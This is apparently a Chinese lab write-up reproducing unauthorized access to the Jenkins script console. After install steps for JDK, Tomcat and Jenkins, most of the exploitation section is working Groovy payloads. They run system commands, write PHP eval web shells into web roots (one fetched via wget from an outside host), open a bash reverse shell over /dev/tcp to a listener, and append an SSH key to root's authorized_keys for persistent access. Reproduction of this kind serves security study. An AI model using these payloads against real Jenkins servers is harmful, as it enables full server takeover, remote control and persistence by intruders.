jenkins未授权访问漏洞复现

1 安装jenkins

wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz

wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war

wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz

#安装jdk

tar zxvf jdk-8u45-linux-x64.tar.gz

mv  jdk1.8.0_45  /usr/local/

mv jdk-8u45-linux-x64.tar.gz  /usr/local/src/

#添加到系统的环境变量

cat >>/etc/profile << EOF

export JAVA_HOME=/usr/local/jdk1.8.0_45

export JRE_HOME=\${JAVA_HOME}/jre

export CLASSPATH=.:\${JAVA_HOME}/lib:\${JRE_HOME}/lib

export PATH=\${JAVA_HOME}/bin:\$PATH

EOF

#使profile文件生效,并查看java版本

source  /etc/profile   

java -version

#安装tomcat

tar zxvf apache-tomcat-8.5.4.tar.gz

mv apache-tomcat-8.5.4  /usr/local/jenkins

rm -rf /usr/local/jenkins/webapps/*

mv apache-tomcat-8.5.4.tar.gz  /usr/local/src/

#修改tomcat字符集,及端口

vim /usr/local/jenkins/conf/server.xml

    <Connector port="8080" URIEncoding="UTF-8" protocol="HTTP/1.1"

               connectionTimeout="20000"

               redirectPort="8443" />

#启动jenkins

mv jenkins_2.121.2.war  /usr/local/jenkins/webapps/jenkins.war

/usr/local/jenkins/bin/startup.sh

2 漏洞描述

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力**用户密码等进脚本执行界面从而获取服务器权限。

3 漏洞利用

  1、Jenkins未授权访问可执行命令

 

http://192.168.22.54:8080/jenkins/manage

http://192.168.22.54:8080/jenkins/script

 

println "ifconfig -a".execute().text 执行一些系统命令

 

wget写shell:

 

new File("/var/www/html/jenkins1.php").write('<[email protected]($_POST[cmd]);?>');   1. println "wget http://shell.secpulse.com/data/t.txt -o /var/www/html/secpulse.php".execute().text

2. new File("/var/www/html/secpulse.php").write('<?php @eval($_POST[s3cpu1se]);?>');

3. def webshell = '<?php @eval($_POST[s3cpu1se]);?>'

new File("/var/www/html/secpulse.php").write("$webshell");

4. def execute(cmd) {

def proc = cmd.execute()

proc.waitFor()

}

execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/secpulse.php' ] )

execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/secpulse.php' ] )

//参数-n 不要在最后自动换行

 

  2.执行命令尝试反弹shell

在对话框中尝试反弹shell，本地NC监听中，发行不行，尝试ping回来，发现网络不通，随即希望正想shell

 

     println 'bash -i >& /dev/tcp/192.168.22.34/4445 0>&1'.execute().text

 

3.上传自己的公钥

 

  println 'echo 公钥内容 >> /root/.ssh/authroized_keys'.execute().text

  ssh -i id_rsa 192.168.22.54